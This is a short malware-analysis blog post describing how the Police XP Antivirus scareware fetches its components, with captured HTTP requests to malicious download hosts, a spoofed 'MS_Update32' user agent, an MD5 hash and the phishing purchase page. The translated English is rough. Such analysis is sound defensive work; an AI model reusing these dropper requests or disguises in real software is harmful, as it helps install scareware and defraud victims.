MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

9.3.09

Strategy aggressive infection Police XP Antivirus. Part Two

From the moment that is the infection of Police Antivirus XP, you will begin to display on screen a series of popup fake alerts about infections, among others.

But in a fully open, they will produce a series of actions to complete the work of scareware.


Through listening to the traffic, we see the unloading of the following components:

GET / setupc.dat HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

Download setup.dat which is a data file but a compressed file that saves a copy of the other files that are unzipped in C:\Program Files \XPPoliceAntivirus.
GET / sysupdate.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

Download sysupdate.exe (MD5: 36e13b0624dbd4bc973d1fd5f949ebe0) is used to compress the run-time malware to try to avoid detection by antivirus programs.
GET / svchost32.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:47:46 GMT
Content-Type: application / octet-stream
Last-Modified: Fri, 27 Feb 2009 16:01:17 GMT
Accept-Ranges: bytes
Content-Length: 2746314
Connection: Keep-Alive
Age: 0

MZ ......................@.......................... .....................!.. L.! This program can not be run in DOS mode.

GET / land.txt HTTP/1.1
User-Agent: wget 3.0
Host: police-xp-09.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:51:15 GMT
Content-Type: text / plain
Last-Modified: Mon, 02 Feb 2009 20:53:00 GMT
ETag: "3a58001-1-bd70a300"
Accept-Ranges: bytes
Content-Length: 1
Connection: Keep-Alive
Age: 0

2

GET / js / window.js HTTP/1.1
Accept: * / *
Referer: http://www.xp-police-09.com/installed.php?id=108
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible-MSIE 6.0-Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id = 108

The JavaScript windows.js screen displays pop-up window with the words Thank you for Installation!


GET / buy.php? Id = 108 HTTP/1.1
Accept: * / *
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible-MSIE 6.0-Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id = 108

This is the page to purchase the scareware from which sensitive information and financial requests of the victim. It's a scam/phishing.

The maneuvers used by malicious code are becoming more aggressive and effective in their actions because, as was visible, the installer is downloaded in the first instance, is only part of the puzzle from which the Other obtains scareware pieces.

Related information
Strategy aggressive infection Police XP Antivirus
Campaign Police Antivirus XP spreading through soc...
A recent tour of scareware IV

Jorge Mieres

0 comentarios:

Post a Comment